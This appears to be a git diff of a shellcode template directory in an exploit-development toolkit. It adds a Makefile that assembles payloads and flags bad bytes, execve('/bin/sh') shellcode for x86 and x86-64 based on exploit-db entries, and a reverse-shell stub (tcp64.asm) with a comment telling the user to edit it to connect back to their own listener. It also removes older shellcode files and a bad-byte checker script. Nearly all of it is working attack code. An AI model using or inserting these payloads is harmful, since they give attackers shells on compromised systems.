diff options
| -rw-r--r-- | templates/shellcode/.gitignore | 1 | ||||
| -rw-r--r-- | templates/shellcode/Makefile | 38 | ||||
| -rw-r--r-- | templates/shellcode/examples/shell32.asm | 16 | ||||
| -rw-r--r-- | templates/shellcode/examples/shell64.asm | 24 | ||||
| -rw-r--r-- | templates/shellcode/examples/tcp64.asm | 49 | ||||
| -rw-r--r-- | templates/shellcode/exit32.asm | 8 | ||||
| -rw-r--r-- | templates/shellcode/exit64.asm | 8 | ||||
| -rw-r--r-- | templates/shellcode/shell32.asm | 15 | ||||
| -rw-r--r-- | templates/shellcode/shell64.asm | 16 | ||||
| -rwxr-xr-x | templates/shellcode/shelltool.py | 30 |
10 files changed, 116 insertions, 89 deletions
diff --git a/templates/shellcode/.gitignore b/templates/shellcode/.gitignore new file mode 100644 index 0000000..e9c55fb --- /dev/null +++ b/templates/shellcode/.gitignore @@ -0,0 +1 @@ +code.* diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile index 2e67adc..757878f 100644 --- a/templates/shellcode/Makefile +++ b/templates/shellcode/Makefile @@ -1,17 +1,31 @@ -.PHONY: all +LDFLAGS?= +FORMAT?=elf64 +CODE?=examples/shell64.asm +GREP=00|0a -all: shell32.elf shell64.elf - @objdump -d shell32.elf | ./shelltool.py - @objdump -d shell64.elf | ./shelltool.py +.PHONY: all elf disas -shell32.o: shell32.asm - nasm -f elf shell32.asm -o shell32.o +# Format bytecode as an escaped string, highlight bad bytes +all: code.bin + @xxd -i -c 16 <code.bin \ + | sed 's/,//g;s/ 0/\\/g;s/^ */"/g;s/$$/"/g' \ + | grep --color=always -E '$(GREP)|$$' -shell32.elf: shell32.o - ld -melf_i386 shell32.o -o shell32.elf +elf: code.o + ld $(LDFLAGS) code.o -o code.elf -shell64.o: shell64.asm - nasm -f elf64 shell64.asm -o shell64.o +disas: code.o + @objdump -d code.o \ + | grep --color=always -E '$(GREP)|$$' -shell64.elf: shell64.o - ld shell64.o -o shell64.elf +code.bin: code.o + objcopy -O binary code.o code.bin + +code.o: code.asm + nasm -f '$(FORMAT)' code.asm -o code.o + +code.asm: + cp '$(CODE)' code.asm + + +# -melf_i386 diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm new file mode 100644 index 0000000..6238469 --- /dev/null +++ b/templates/shellcode/examples/shell32.asm @@ -0,0 +1,16 @@ +; Originally based on https://www.exploit-db.com/shellcodes/46809 +; See shell64.asm for more details. + +; execve("/bin/sh", ["/bin/sh"], []) +xor eax, eax +xor ecx, ecx +push ecx +push 0x68732f2f +push 0x6e69622f +mov ebx, esp +push ecx +mov edx, esp +push ebx +mov ecx, esp +mov al, 11 +int 0x80 diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm new file mode 100644 index 0000000..3812c33 --- /dev/null +++ b/templates/shellcode/examples/shell64.asm @@ -0,0 +1,24 @@ +; Originally based on https://www.exploit-db.com/shellcodes/47008 + +; stack layout +; +; ┏━━━━━━━━━━━━━━┓ +; ┃ v +; [ argv0, NULL ] "/bin//sh" NULL +; ^ ^ ^ +; ┃ ┃ ┃ +; argv envp filename + +; execve("/bin/sh", ["/bin/sh"], []) +xor rax, rax +xor rsi, rsi +mov rdi, 0x68732f2f6e69622f +push rsi +push rdi +mov rdi, rsp +push rsi +mov rdx, rsp +push rdi +mov rsi, rsp +mov al, 59 +syscall diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm new file mode 100644 index 0000000..1ec3bc8 --- /dev/null +++ b/templates/shellcode/examples/tcp64.asm @@ -0,0 +1,49 @@ +; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html + +; socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +xor rax, rax +xor rdi, rdi +xor rsi, rsi +xor rdx, rdx +mov al, 41 +mov dil, 2 +mov sil, 1 +syscall + +; !! Edit this section to connect back to your listener !! +; +; struct sockaddr_in { // Struct size: 16 +; short int sin_family; // AF_INET (2) +; unsigned short int sin_port; // Set to 8080 below +; struct in_addr sin_addr; // Set to 127.0.0.1 below +; unsigned char sin_zero[8]; +; }; +; +; struct in_addr { // Struct size: 4 +; uint32_t s_addr; +; }; +xor rbx, rbx +push rbx +mov rbx, 0x0100007f901f0002 +push rbx + +; connect(fd, sockaddr, sizeof sockaddr) +mov rdi, rax +mov rsi, rsp +mov dl, 16 +xor rax, rax +mov al, 42 +syscall + +; dup2(fd, stdin) +; dup2(fd, stdout) +; dup2(fd, stderr) +xor rsi, rsi +mov al, 33 +syscall +mov sil, 1 +mov al, 33 +syscall +mov sil, 2 +mov al, 33 +syscall diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm deleted file mode 100644 index 559c89c..0000000 --- a/templates/shellcode/exit32.asm +++ /dev/null @@ -1,8 +0,0 @@ -[SECTION .text] -global _start - -_start: - xor ebx, ebx - xor eax, eax - mov al, 0x1 - int 0x80 diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm deleted file mode 100644 index fb899a2..0000000 --- a/templates/shellcode/exit64.asm +++ /dev/null @@ -1,8 +0,0 @@ -[SECTION .text] -global _start - -_start: - xor rdi, rdi - mov al, 0x3c - cdq - syscall diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm deleted file mode 100644 index 5ff2e12..0000000 --- a/templates/shellcode/shell32.asm +++ /dev/null @@ -1,15 +0,0 @@ -[SECTION .text] -global _start - -; https://www.exploit-db.com/shellcodes/46809 - -_start: - xor ecx, ecx - xor edx, edx - push 0xb - pop eax - push ecx - push 0x68732f2f - push 0x6e69622f - mov ebx, esp - int 0x80 diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm deleted file mode 100644 index 2353b6f..0000000 --- a/templates/shellcode/shell64.asm +++ /dev/null @@ -1,16 +0,0 @@ -[SECTION .text] -global _start - -; https://www.exploit-db.com/shellcodes/47008 - -_start: - xor rsi, rsi - xor rdx, rdx - push rsi - mov rdi, 0x68732f2f6e69622f - push rdi - push rsp - pop rdi - mov al, 0x3b - cdq - syscall diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py deleted file mode 100755 index b95a8cd..0000000 --- a/templates/shellcode/shelltool.py +++ /dev/null @@ -1,30 +0,0 @@ -#!/usr/bin/env python - -# This script will convert shellcode disassembly into an escaped string literal -# and warn about problematic bytes in the payload. -# objdump -d elf | ./shelltool.py - -import sys - -name = None -bytecode = [] -badchars = [ 0x00, 0x0a ] - -for line in sys.stdin: - for tok in line.split(): - if name is None: - name = tok - if len(tok) == 2: - try: - bytecode.append(int(tok, base=16)) - except: - pass - -result = ''.join([ "\\x%02x"%(x) for x in bytecode ]) -result = f'{name}"{result}"' - -for x in badchars: - if x in bytecode: - result += f' **0x{"%02x"%(x)} detected**' - -print(result) |